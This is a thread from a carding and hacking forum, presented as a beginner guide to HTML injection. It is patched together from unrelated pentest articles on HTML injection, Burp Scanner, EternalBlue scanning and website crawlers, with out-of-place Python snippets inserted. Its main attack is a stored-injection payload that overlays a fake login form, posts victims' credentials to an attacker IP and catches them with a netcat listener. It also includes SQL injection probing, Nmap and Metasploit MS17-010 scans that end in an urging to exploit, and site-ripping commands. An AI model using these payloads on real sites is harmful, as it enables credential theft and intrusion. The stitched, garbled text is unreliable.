[Guide] How to do HTML Injection (Beginner) - Printable Version
+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to do HTML Injection (Beginner) (/Thread-Guide-How-to-do-HTML-Injection-Beginner)
[Guide] How to do HTML Injection (Beginner) - NINZA - 05-04-2020

From W3Schools: HTML is the standard HyperText Markup Language, used for designing web pages.
HTML Tags
HTML tags are element names surrounded by angle brackets. They come in two types: the start tag, also known as the opening tag, and the end tag, also known as the closing tag.

HTML Elements
An HTML element usually consists of a start tag and an end tag, with the content inserted in between.

HTML Attributes
Attributes provide additional information about HTML elements. Attributes generally come in the form of name/value pairs like: name="value"

Create a web page using HTML
Generally "Notepad" is used for writing HTML code. Save the text file with a .html/.htm extension, for example "test.html", then open the saved file in any web browser. To create a simple web page, type the following code inside Notepad and save it as test.html:

<!DOCTYPE html>
<html>
<head>
<title> HTML TUTORIALS</title>
</head>
<body bgcolor="pink">
<br>
<center><h2>WELCOME TO HACKING ARTICLES </h2>
<br>
<p>Author "Raj Chandel"</p>
</center>
</body>
</html>

When you open test.html in a web browser, you will see the page shown in the image below.
Since the early days of the web, there have been many versions of HTML:

Version     Year
HTML        1991
HTML 2.0    1995
HTML 3.2    1997
HTML 4.01   1999
XHTML       2000
HTML5       2014

To learn more about HTML, visit w3schools.com.

HTML injection
HTML injection is a vulnerability in a website that occurs when user input is not correctly sanitized or the output is not encoded, allowing an attacker to inject valid HTML code into a vulnerable web page. Many techniques use elements and attributes to submit HTML content. If these methods are supplied with untrusted input, there is a high risk of XSS, specifically HTML injection. If strings are not correctly sanitized, the problem can lead to XSS-based HTML injection. This vulnerability can have many consequences, such as disclosure of a user's session cookies, which could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

There are two types of HTML injection, as follows:
Stored HTML injection, also known as persistent, is a vulnerability in which the injected malicious script is permanently stored on the web server, and the application serves it back to users when they visit the affected page. When the client clicks on the payload, which appears to be an official part of the website, the injected HTML code is executed by the browser. The most common example is the comment option on blogs, which allows users to POST comments for the administrator or other users.

Example: Below is a web application vulnerable to stored HTML injection, which allows users to submit entries to the blog, as shown in the screenshot. First, the user "raj", acting as an attacker, made a normal entry, which was successfully added to the web server's database.

Enter the following HTML code inside the given text area to perform the HTML attack:

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.104/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

The above HTML code generates a payload that overlays a fake user login page on the targeted web page and forwards the entered credentials to the
attacker's IP address.

You can see below that the login page looks valid to the user, and it is stored on the web server. Now, when the victim opens the malicious page, he receives the web page above, which looks official to him, and he submits his credentials on that page. As soon as he does, the request is forwarded to the attacker's IP address.

nc -vlp 80

The attacker receives the user's credentials as a response in netcat. From the screenshot, you can read username=bee & password=bug. The attacker can now use these credentials to log in.

Reflected HTML
Reflected HTML injection, also known as non-persistent, occurs when the web application responds immediately to the user's input without validating it. This lets an attacker inject browser-executable code inside a single HTML response. It is called "non-persistent" because the malicious script is not stored on the web server; instead, the attacker delivers the malicious link through phishing to trap the user. The most common place for this kind of vulnerability is a website's search feature: the attacker writes arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page renders those HTML entities.

Example: The following web page allows a user to submit his first and last name, but these text fields are vulnerable to HTML injection.

Now type the following HTML code in the text field given for the first name; it creates a link to hackingarticles.in when you click on "RAJ":

<h1><a href="http://www.hackingarticles.in">RAJ</a></h1>

Similarly, type the following code in the text field given for the last name:

<h2>CHANDEL</h2>

Click the Go tab to submit these as the first and last name.
From the given screenshot, you can see it has submitted RAJ CHANDEL, and the word "RAJ" contains a link to hackingarticles.in; when you click the link, it forwards you to hackingarticles.in.

Hello friends! Today we are going to use the Burp Suite Scanner, which is used in website security testing to identify vulnerabilities. It is the first phase of web penetration testing for every security tester. Burp Scanner is a tool for automatically finding security vulnerabilities in web applications. It is designed to be used by security testers and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

[To see content please register here]

Let's start with the Burp proxy in order to intercept requests between the browser and the website. From the screenshot, you can see that we have forwarded the intercepted data for an active scan. Note: Always configure your browser proxy while using Burp Suite to intercept requests.

Through a window alert, Burp asks you to confirm the active scan; press YES to begin the active scan on the targeted website.

Issue Activity
The Issue activity tab contains a sequential record of the Scanner's activity in finding new issues and updating existing issues. This is useful for various purposes.
Active Scan Queue
Active scanning typically involves sending large numbers of requests to the server for each base request that is scanned, and this can be a time-consuming process. When you send requests for active scanning, they are added to the active scan queue, where they are processed in turn.
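The queue behavior described above is a plain first-in, first-out work queue. Here is a minimal illustrative sketch of the pattern in Python (not Burp's actual implementation; the request strings are made-up examples):

```python
from collections import deque

# Illustrative FIFO scan queue: requests are added as they arrive
# and are processed in turn, like Burp's active scan queue.
scan_queue = deque()

def enqueue(request):
    # Add a new base request to the back of the queue.
    scan_queue.append(request)

def process_next():
    # Return the oldest queued request, or None when the queue is empty.
    return scan_queue.popleft() if scan_queue else None

enqueue("GET /listproducts.php?cat=1")
enqueue("GET /login.php")
print(process_next())  # the oldest request comes out first
```

The deque gives O(1) appends and pops at both ends, which is why it is the idiomatic choice over a plain list for a work queue.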
Advisory on Cross-site scripting (reflected)
It gives a brief description of the vulnerability and an idea of how to exploit it.
Issue: Cross-site scripting (reflected)
Severity: High
Confidence: Certain
Host: [To see content please register here]
Path: /listproducts.php
The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload was submitted in the cat parameter. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Inside the Request tab, we get the injected payload along with the intercepted data in order to see the response to the generated request. In the given image, you can observe that JavaScript has been injected into the URL via the cat parameter.

In the response, we can see the injected payload submitted to the database. It generates an alert prompt on the screen when executed on the website.

Let's verify it manually on the running website. Execute the script in the URL with the cat parameter; as a result, an alert window displaying 1 pops up.

Advisory on SQL injection
Similarly, test for other vulnerabilities.
Issue: SQL injection
Severity: High
Confidence: Firm
Host: [To see content please register here]
Path: /listproducts.php
The cat parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cat parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether the vulnerability is present. The database appears to be MySQL.

Under the Request tab, a single quote (') is passed with the cat parameter to break the SQL statement and trigger a database error in the response.

Under the Response tab, you can read the highlighted text, which clearly points to a SQL injection vulnerability in the database.
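The reflected XSS advisory above hinges on one question: is the cat value copied into the response verbatim, or output-encoded? A minimal sketch of that check in Python, using the standard html.escape as the reference encoding (the response bodies here are made-up examples, not captures from the real site):

```python
import html

def is_reflected_unencoded(payload, response_body):
    # If the raw payload string appears in the response, the application
    # echoed it without output encoding and the page is injectable.
    return payload in response_body

payload = "<script>alert(1)</script>"

# Hypothetical response bodies: one echoes the input raw, one encodes it.
vulnerable_body = "<p>Results for: " + payload + "</p>"
encoded_body = "<p>Results for: " + html.escape(payload) + "</p>"

print(is_reflected_unencoded(payload, vulnerable_body))  # True
print(is_reflected_unencoded(payload, encoded_body))     # False
```

Applying html.escape (or the equivalent in your server-side language) to every reflected value is also the fix for both the stored and reflected injections shown earlier: the payload then renders as inert text instead of live markup.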
Advisory on Flash cross-domain policy
Issue: Flash cross-domain policy
Severity: High
Confidence: Certain
Host: [To see content please register here]
Path: /crossdomain.xml
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Similarly, as above, it generated the request through the GET method using crossdomain.xml.

It received a successful response to its GET request; in the highlighted text you can read that access to this site is allowed from any domain on any port, and secure is set to false. In this way, we can see how the Burp Suite scanner tests the security loopholes of a website.

Hello friends! As we all know, Microsoft Windows 7 is exploitable by EternalBlue via SMBv1. Microsoft then patched this vulnerability by updating the SMB version. Still, a large number of Windows 7 users have not updated their systems. If a security tester wants to separate vulnerable systems from updated ones, he needs to scan to identify the vulnerable systems. The eternal scanner is a network scanner for the EternalBlue exploit, CVE-2017-0144.

Target: Windows 7
Attacker: Kali Linux

Open the terminal in your Kali Linux and type the following command to download it from GitHub:

git clone [To see content please register here] && cd eternal_scanner

Once it has installed successfully, launch the scanner from the terminal by typing the following:

escan

Once the scanner is launched inside the terminal, it will ask you to enter a target IP; you can also add a range of IPs for scanning.
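Since the scanner accepts a range of targets, it helps to see how a CIDR range expands into individual host addresses. A small sketch with Python's standard ipaddress module (illustrative only, independent of the eternal scanner's own parsing; the /30 block is chosen so it contains the 192.168.1.106 target used below):

```python
import ipaddress

def expand_range(cidr):
    # Return each usable host address in the CIDR block as a string,
    # skipping the network and broadcast addresses.
    return [str(ip) for ip in ipaddress.ip_network(cidr).hosts()]

# 192.168.1.104/30 covers .104-.107; its usable hosts are .105 and .106.
print(expand_range("192.168.1.104/30"))
```

Each resulting address would then be probed on port 445 in turn, which is exactly what feeding a range to the scanner does.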
We have given only a single IP for scanning, i.e. 192.168.1.106, as the target. It then starts scanning and dumps the IPs that are vulnerable in the given range; from the screenshot, you can observe it has dumped 192.168.1.106:445 as a vulnerable IP with SMB port 445 and saved the output inside /root/eternal_scanner/vulnr.txt.

When you open the output file, you will see the vulnerable IP as well as the name of the exploit, "MS17-010", as shown in the given image. Similarly, you can scan the target using Nmap and Metasploit.

Nmap
The script attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (MS17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry, Petya ransomware, and other malware. The script connects to the $IPC tree, executes a transaction on FID 0, and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against MS17-010. Additionally, it checks for known error codes returned by patched systems. Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

The following command scans for SMB vulnerabilities using the built-in scripts and reports according to the output:

nmap -T4 -p445 --script vuln 192.168.1.106

You can observe from the given screenshot that port 445 is open and vulnerable. The target is exploitable via MS17-010; moreover, the risk rating is High, which means it is easily exploitable.

We can scan directly for the MS17-010 SMB vulnerability using the following Nmap command:

nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

From the given screenshot, you can observe that it scanned only for MS17-010 and found the target vulnerable to it. From both Nmap results, we conclude that the target is vulnerable due to Microsoft SMBv1.
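Before moving on to Metasploit, it is worth noting that the scanner's vulnr.txt output can be post-processed to feed other tools. A small sketch, assuming (based on the screenshot description above) that each vulnerable host appears as one "ip:port" entry per line; any other format would need the parsing adjusted:

```python
def parse_scan_output(lines):
    # Assumed vulnr.txt layout: one "ip:port" entry per line
    # (e.g. "192.168.1.106:445"); lines without a numeric port are skipped.
    targets = []
    for line in lines:
        ip, sep, port = line.strip().rpartition(":")
        if sep and port.isdigit():
            targets.append((ip, int(port)))
    return targets

# Example lines as the output file might contain them (hypothetical).
print(parse_scan_output(["192.168.1.106:445", "", "[MS17-010]"]))
```

The resulting (ip, port) pairs can then be looped over to set rhosts/rport in the Metasploit module shown next.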
Metasploit
This module uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\" and connect to IPC$.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

From the screenshot, you can see that the host is vulnerable to MS17-010. Great!!! Now use MS17-010 to exploit your target.

From Wikipedia: A web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of web indexing. A web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit. If the crawler is performing archiving of websites, it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern-day database.

Let's begin!!

Metasploit
This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.
use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > set rhosts [To see content please register here]
msf auxiliary(msfcrawler) > exploit

From the screenshot, you can see it has loaded the crawler in order to extract hidden files from a website, for example about.php, jQuery contact forms, HTML files, and so on, which is not possible to extract manually from the website using a browser. We can use it for information gathering on any website.

Httrack
HTTrack is a free and open-source web crawler and offline browser, developed by Xavier Roche. It allows you to download a World Wide Web site from the Internet to a local directory, building all directories recursively and getting HTML, images, and other files from the server to your computer. HTTrack preserves the original site's relative link structure. Type the following command in the terminal:

httrack [To see content please register here] -O /root/Desktop/file

It saves the output inside the given directory, /root/Desktop/file.

From the given screenshot, you can observe that it has dumped the website's information, consisting of HTML files as well as JavaScript and jQuery.

Black Widow
This web spider utility detects and displays detailed information for a user-selected web page, and it offers other web page tools. BlackWidow's clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multi-threading to quickly download all files and test the links. The operation takes only a few minutes for small websites. You can download it from here.
Enter your URL [To see content please register here] in the Address field and press Go.

Click the Start button on the left side to begin URL scanning, and select a folder to save the output file. From the screenshot, you can observe that I browsed to C:\Users\RAJ\Desktop\tptl in order to store the output file there.

When you open the target folder tptl, you will find the entire data of the website, whether images, content, HTML files, PHP files, or JavaScript, all saved in it.

Website Ripper Copier
Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader for saving website data. WRC can download website files to a local drive for offline browsing, extract website files of a certain size and type, like images, video, pictures, movies, and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti-pop-up web/offline browser. Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS, and FTP connections, access password-protected sites, support web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads. You can download it from [To see content please register here].

Choose the "websites for offline browsing" option.

Enter the website URL as [To see content please register here] and click Next.

Specify the directory path to save the output and click Run Now.

When you open the selected folder tp, you will find the fetched CSS, PHP, HTML, and JS files inside it.

Burp Suite Spider
Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.
For more detail, read our previous articles from [To see content please register here]. From the given screenshot, you can observe that I fetched the HTTP request of [To see content please register here]; now send it to the Spider with the help of the Action tab.

The targeted website has been added to the site map under the Target tab as a new scope for web crawling. From the screenshot, you can see it started web crawling the target website, collecting the website's information in the form of PHP, HTML, and JS files.
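All of the crawlers above share the same core step: parse each fetched page and extract its links to feed the list of URLs to visit next. A minimal sketch of that step using Python's standard html.parser (the sample page and its paths are made-up for illustration):

```python
from html.parser import HTMLParser

class LinkExtractor(HTMLParser):
    # Collects href values from anchor tags, the way a crawler builds
    # its queue of URLs to visit next.
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

# Hypothetical fetched page with two internal links.
page = '<html><body><a href="/about.php">About</a><a href="/contact.html">Contact</a></body></html>'

extractor = LinkExtractor()
extractor.feed(page)
print(extractor.links)
```

A full crawler would resolve each extracted link against the page's base URL, deduplicate, and fetch in turn; tools like HTTrack and Burp Spider wrap exactly this loop with storage and scoping on top.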